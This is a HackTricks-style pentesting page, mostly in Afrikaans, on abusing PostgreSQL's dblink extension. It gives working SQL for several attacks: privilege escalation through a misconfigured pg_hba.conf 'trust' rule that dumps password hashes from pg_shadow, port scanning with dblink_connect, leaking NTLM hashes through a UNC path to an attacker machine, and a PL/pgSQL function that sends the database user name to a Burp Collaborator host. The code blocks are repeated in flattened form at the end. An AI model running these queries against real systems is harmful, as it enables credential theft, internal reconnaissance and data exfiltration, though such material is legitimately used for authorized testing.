Network - Privesc, Port Scanner and NTLM chanllenge response disclosure

Leer & oefen AWS Hacking:HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Vind meer inligting oor hierdie aanvalle in die oorspronklike dokument.

Sedert PostgreSQL 9.1 is die installasie van addisionele modules eenvoudig. Geregistreerde uitbreidings soos dblink kan geïnstalleer word met CREATE EXTENSION:

CREATE EXTENSION dblink;

Once you have dblink loaded you could be able to perform some interesting tricks:

Privilege Escalation

Die lêer pg_hba.conf kan sleg geconfigureer wees wat verbindings vanaf localhost as enige gebruiker toelaat sonder om die wagwoord te hoef te ken. Hierdie lêer kan tipies gevind word in /etc/postgresql/12/main/pg_hba.conf en 'n slegte konfigurasie lyk soos:

local    all    all    trust

Note dat hierdie konfigurasie algemeen gebruik word om die wagwoord van 'n db-gebruiker te wysig wanneer die admin dit vergeet, so soms mag jy dit vind. Note ook dat die lêer pg_hba.conf slegs deur die postgres-gebruiker en -groep leesbaar is en slegs deur die postgres-gebruiker skryfbaar is.

Hierdie geval is nuttig as jy reeds 'n shell binne die slagoffer het, aangesien dit jou sal toelaat om met die postgresql-databasis te verbind.

'n Ander moontlike miskonfigurasie bestaan uit iets soos hierdie:

host    all     all     127.0.0.1/32    trust

Aangesien dit almal van die localhost sal toelaat om as enige gebruiker met die databasis te verbind. In hierdie geval en as die dblink funksie werk, kan jy privileges verhoog deur met die databasis te verbind deur 'n reeds gevestigde verbinding en toegang te verkry tot data wat jy nie behoort te kan toegang nie:

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'SELECT datname FROM pg_database')
RETURNS (result TEXT);

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'select usename, passwd from pg_shadow')
RETURNS (result1 TEXT, result2 TEXT);

Port Scanning

Deur dblink_connect te misbruik kan jy ook oop poorte soek. As daardie **funksie nie werk nie, moet jy probeer om dblink_connect_u() te gebruik, aangesien die dokumentasie sê dat dblink_connect_u() identies is aan dblink_connect(), behalwe dat dit nie-supergebruikers toelaat om te verbind met enige autentikasie metode nie_.

SELECT * FROM dblink_connect('host=216.58.212.238
port=443
user=name
password=secret
dbname=abc
connect_timeout=10');
//Different response
// Port closed
RROR:  could not establish connection
DETAIL:  could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 4444?

// Port Filtered/Timeout
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTP server
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTPS server
ERROR:  could not establish connection
DETAIL:  received invalid response to SSL negotiation:

Let wel dat voor jy in staat is om dblink_connect of dblink_connect_u te gebruik, jy dalk moet uitvoer:

CREATE extension dblink;

UNC pad - NTLM hash openbaarstelling

-- can be used to leak hashes to Responder/equivalent
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';

-- to extract the value of user and send it to Burp Collaborator
CREATE TABLE test(retval text);
CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
SELECT INTO userval (SELECT user);
sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT testfunc();

Ondersteun HackTricks

Kyk na die subskripsieplanne!
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousPL/pgSQL Password Bruteforce NextBig Binary Files Upload (PostgreSQL)

Last updated 4 months ago

SELECT * FROM dblink('host=127.0.0.1 user=postgres dbname=postgres', 'SELECT datname FROM pg_database') RETURNS (result TEXT); SELECT * FROM dblink('host=127.0.0.1 user=postgres dbname=postgres', 'select usename, passwd from pg_shadow') RETURNS (result1 TEXT, result2 TEXT);

SELECT * FROM dblink_connect('host=216.58.212.238 port=443 user=name password=secret dbname=abc connect_timeout=10'); //Different response // Port closed RROR: could not establish connection DETAIL: could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 4444? // Port Filtered/Timeout ERROR: could not establish connection DETAIL: timeout expired // Accessing HTTP server ERROR: could not establish connection DETAIL: timeout expired // Accessing HTTPS server ERROR: could not establish connection DETAIL: received invalid response to SSL negotiation:

-- to extract the value of user and send it to Burp Collaborator CREATE TABLE test(retval text); CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$ DECLARE sqlstring TEXT; DECLARE userval TEXT; BEGIN SELECT INTO userval (SELECT user); sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\''; EXECUTE sqlstring; END; $$ LANGUAGE plpgsql SECURITY DEFINER; SELECT testfunc();